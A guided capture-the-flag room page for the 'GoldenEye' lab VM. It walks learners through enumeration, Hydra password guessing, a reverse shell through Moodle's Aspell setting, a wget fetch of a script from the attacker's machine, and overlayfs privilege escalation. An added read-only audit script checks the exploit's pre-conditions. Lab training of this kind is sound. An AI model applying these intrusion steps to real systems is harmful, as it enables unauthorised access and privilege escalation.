
GoldenEye

Bond, James Bond. A guided CTF.

Difficulty: medium

Estimated time: 75 min

Task 1: Intro & Enumeration

This room will be a guided challenge to hack the James Bond styled box and get root.

Credit to creosote for creating this VM. This machine is used here with the explicit permission of the creator <3

So... Let's get started!

Answer the questions below

First things first, connect to our network and deploy the machine.

Use nmap to scan the network for all ports. How many ports are open?

Take a look at the website, dive into the source code too, and remember to inspect all scripts!

Who needs to make sure they update their default password?

What's their password?

Now go use those credentials and login to a part of the site.

On to the next steps...

Answer the questions below

Take a look at some of the other services you found using your nmap scan. Are the credentials you have reusable?

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?

What's their new password?

Inspect port 55007. What service is configured to use this port?

Login using that service and the credentials you found earlier.

What can you find on this service?

What user can break Boris' codes?

Using the users you found on this service, find other users' passwords.

Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.

Answer the questions below

If you remember, some of the emails you discovered mention the severnaya-station.com website. To get this working, you need to update your local name resolution (the hosts file) so the hostname resolves to the machine.

If you're on Linux edit your "/etc/hosts" file and add:

<machines ip> severnaya-station.com

If you're on Windows, do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file.

Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir

Try using the credentials you found earlier. Which user can you login as?

Have a poke around the site. What other user can you find?

What was this user's password?

Use this user's credentials to go through all the services you have found to reveal more emails.

What is the next user you can find from doak?

What is this user's password?

Take a look at their files on the Moodle site (severnaya-station.com).

Download the attachments and see if there are any hidden messages inside them.

Using the information you found in the last task, login with the newly found user.

As this user has more site privileges, you are able to edit the Moodle settings. From here, get a reverse shell using Python and netcat.

Take a look into Aspell, the spell checker plugin.

Now that you have enumerated enough to get an administrative Moodle login and gain a reverse shell, it's time to escalate privileges.

Answer the questions below

Download linuxprivchecker to enumerate installed development tools.

To get the file onto the machine, you will need to wget it from your local machine, as the VM cannot fetch files from the internet. Follow these steps to get a file onto the VM:

  • Download the linuxprivchecker file locally
  • Navigate to the file on your file system
  • Do: python -m SimpleHTTPServer 1337 (leave this running; on Python 3 the equivalent is python3 -m http.server 1337)
  • On the VM you can now do: wget <your IP>:1337/<file>.py

OR

Enumerate the machine manually.

What's the kernel version?

This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:

  • Create a new user and mount namespace using clone with the CLONE_NEWUSER|CLONE_NEWNS flags.
  • Mount an overlayfs using /bin as the lower filesystem and some temporary directories as the upper and work directories.
  • The overlayfs mount would only be visible within the user namespace, so let the namespace process change its CWD to the overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
  • Make su on the overlayfs world writable without changing the owner.
  • Let a process outside the user namespace write arbitrary content to the file, applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
  • Execute the modified su binary.

You can download the exploit from here: https://www.exploit-db.com/exploits/37292

Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is key!
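The manual enumeration the task asks for (kernel version, installed development tools) is the same inventory a defender runs when deciding whether a host is exposed to this class of bug. The script below is an added example and is not part of the room, linuxprivchecker, or the exploit-db entry: it reads the kernel release, lists compilers and interpreters found on PATH, and reports whether unprivileged user namespaces (the first step in the list above depends on them) and the overlay filesystem are available. The /proc paths are standard Linux interfaces; the Debian/Ubuntu-specific unprivileged_userns_clone toggle is only consulted when it exists.

```shell
#!/bin/sh
# Added example (not the room's or linuxprivchecker's code): a read-only
# audit of the pre-conditions behind the overlayfs technique described above.
# Run it on a lab VM you own; nothing here modifies the system.

# Kernel release string, the same value `uname -r` prints.
kernel_version() {
    if [ -r /proc/sys/kernel/osrelease ]; then
        cat /proc/sys/kernel/osrelease
    else
        uname -r
    fi
}

# Development tools found on PATH, one per line. A box with a C compiler
# lets a local user build native exploits in place, which is why
# production hardening guides recommend removing them.
dev_tools() {
    for t in gcc cc g++ clang make as ld python python2 python3 perl; do
        if command -v "$t" >/dev/null 2>&1; then
            echo "$t"
        fi
    done
}

# Number of tools found (a single value that is easy to assert on).
dev_tool_count() {
    dev_tools | wc -l | tr -d ' '
}

# Can an unprivileged user create user namespaces?
# Prints "enabled", "disabled" or "unknown".
unpriv_userns_state() {
    # Debian/Ubuntu kernels expose a dedicated toggle (1 = allowed).
    if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
        if [ "$(cat /proc/sys/kernel/unprivileged_userns_clone)" = "1" ]; then
            echo enabled
        else
            echo disabled
        fi
        return
    fi
    # Mainline kernels: a limit of 0 disables user namespace creation.
    if [ -r /proc/sys/user/max_user_namespaces ]; then
        if [ "$(cat /proc/sys/user/max_user_namespaces)" = "0" ]; then
            echo disabled
        else
            echo enabled
        fi
        return
    fi
    echo unknown
}

# Is the overlay filesystem registered at all? Older kernels call it
# "overlayfs", newer ones "overlay"; both are matched.
overlayfs_present() {
    if grep -qE '(^|[[:space:]])overlay(fs)?$' /proc/filesystems 2>/dev/null; then
        echo yes
    else
        echo no
    fi
}

audit_report() {
    echo "kernel release          : $(kernel_version)"
    echo "dev tools on PATH       : $(dev_tools | tr '\n' ' ')"
    echo "dev tool count          : $(dev_tool_count)"
    echo "unprivileged user ns    : $(unpriv_userns_state)"
    echo "overlay filesystem      : $(overlayfs_present)"
}

audit_report
```

If the report shows a compiler present, unprivileged user namespaces enabled and overlay registered on a pre-fix kernel, the host has every pre-condition the task relies on; on a patched or hardened system the expected outcome is a disabled user namespace toggle or no compiler, and the audit gives you the exact line to cite when recommending the change.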

What development tools are installed on the machine?

What is the root flag?

Room Type: Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!

Users in Room: 22,151

Created: 2388 days ago
